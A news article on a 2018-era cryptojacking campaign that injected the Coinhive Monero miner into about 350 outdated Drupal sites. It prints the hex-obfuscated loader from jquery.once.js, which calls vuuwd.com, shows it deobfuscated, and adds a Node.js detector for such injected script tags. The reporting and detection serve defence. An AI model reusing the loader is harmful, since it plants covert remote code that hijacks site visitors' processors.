An outdated version of Drupal, a popular content management system, let hackers mine the cryptocurrency Monero on over 300 websites including the websites for the “San Diego Zoo and the government of Chihuahua, Mexico.” A report by Troy Mursch outlined how the hack worked and even showed how much processing power browsers began taking up when they pointed at the hacked sites.
The hack uses a form of code injection that forces the browser to run Coinhive, a small bit of JavaScript-based mining software. The code mines Monero, the ostensibly anonymous cryptocurrency.
The hacked sites all pointed to a URL – “http://vuuwd.com/t.js” – where Coinhive lived. The browser ran the software and began using up CPU power to mine the coin.
Mursch performed a comprehensive search for potentially affected sites and narrowed things down to about 350 sites, all of them running older versions of Drupal.
“The affected sites varied by hosting providers and countries and no specific one appeared to be targeted. The most unique domains were found in the United States and were hosted by Amazon,” he wrote.
The code appears at the end of jquery.once.js and is still visible on this site. It consists of a single line:
var dZ1= window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x73\x42\x79\x54\x61\x67\x4e\x61\x6d\x65"]('\x68\x65\x61\x64')[0]; var ZBRnO2= window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74"]('\x73\x63\x72\x69\x70\x74'); ZBRnO2["\x74\x79\x70\x65"]= '\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74'; ZBRnO2["\x69\x64"]='\x6d\x5f\x67\x5f\x61';ZBRnO2["\x73\x72\x63"]= '\x68\x74\x74\x70\x73\x3a\x2f\x2f\x76\x75\x75\x77\x64\x2e\x63\x6f\x6d\x2f\x74\x2e\x6a\x73'; dZ1["\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64"](ZBRnO2);
Which, deobfuscated, translates to:
'use strict';
// grab the <head> element
var dZ1 = window["document"]["getElementsByTagName"]('head')[0];
// create a new <script> element
var ZBRnO2 = window["document"]["createElement"]('script');
/** @type {string} */
ZBRnO2["type"] = "text/javascript";
/** @type {string} */
ZBRnO2["id"] = "m_g_a";
/** @type {string} */
ZBRnO2["src"] = "https://vuuwd.com/t.js";
// inject it into <head>, so the remote miner loads on every page view
dZ1["appendChild"](ZBRnO2);
The domain it calls, vuuwd.com, is down.
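As an added example (not code from the article or from Bad Packets), here is a small Node.js checker that undoes the \xNN string obfuscation seen above and flags any self-created script element whose src points at a host outside an allow-list. The sample input is constructed to mirror the injected loader, and the allow-list host cdn.example.org is an assumption.

```javascript
// Added example, not from the article or from Bad Packets: decode the "\xNN"
// string obfuscation used by the injected loader and flag any dynamically
// created <script> element whose src points outside an allow-list of hosts.
// Intended to run (Node.js) over a site's shipped JS assets such as jquery.once.js.

// Decode every \xNN escape in a JS source text. Only the two-hex-digit form is
// handled, which is the form the injected line uses.
function decodeHexEscapes(src) {
  return src.replace(/\\x([0-9a-fA-F]{2})/g, (_, hex) =>
    String.fromCharCode(parseInt(hex, 16)));
}

// Returns the external script URLs assigned to a <script> element that the
// decoded source creates itself. Hosts in allowedHosts (e.g. your own CDN)
// are ignored; relative src values are skipped. Heuristic, not a JS parser.
function findInjectedScriptUrls(src, allowedHosts) {
  const decoded = decodeHexEscapes(src);
  const createsScript =
    /(?:\[\s*["']createElement["']\s*\]|\.createElement)\s*\(\s*["']script["']\s*\)/
      .test(decoded);
  if (!createsScript) return [];
  const urls = [];
  const srcAssign = /(?:\[\s*["']src["']\s*\]|\.src)\s*=\s*["']([^"']+)["']/g;
  let m;
  while ((m = srcAssign.exec(decoded)) !== null) {
    let host;
    try { host = new URL(m[1]).hostname; } catch (e) { continue; }
    if (!allowedHosts.includes(host)) urls.push(m[1]);
  }
  return urls;
}

// Constructed sample modelled on the injected line quoted above (String.raw
// keeps the backslashes so the escapes reach decodeHexEscapes undecoded).
const SAMPLE = String.raw`var d= window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74"]('\x73\x63\x72\x69\x70\x74'); d["\x73\x72\x63"]= '\x68\x74\x74\x70\x73\x3a\x2f\x2f\x76\x75\x75\x77\x64\x2e\x63\x6f\x6d\x2f\x74\x2e\x6a\x73';`;

// cdn.example.org is an assumed first-party host for the allow-list
console.log(findInjectedScriptUrls(SAMPLE, ["cdn.example.org"]));
// prints [ 'https://vuuwd.com/t.js' ]
```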
Bad Packets has a full list of the hacked websites and, as evidenced by the lines above, it doesn’t seem that many folks are rushing to fix their sites. A canonical list appears here.
“Notable sites include those of Lenovo, UCLA, DLink (Brazil), and Office of Inspector General of the U.S. Equal Employment Opportunity Commission (EEOC) — a US federal government agency,” wrote Mursch.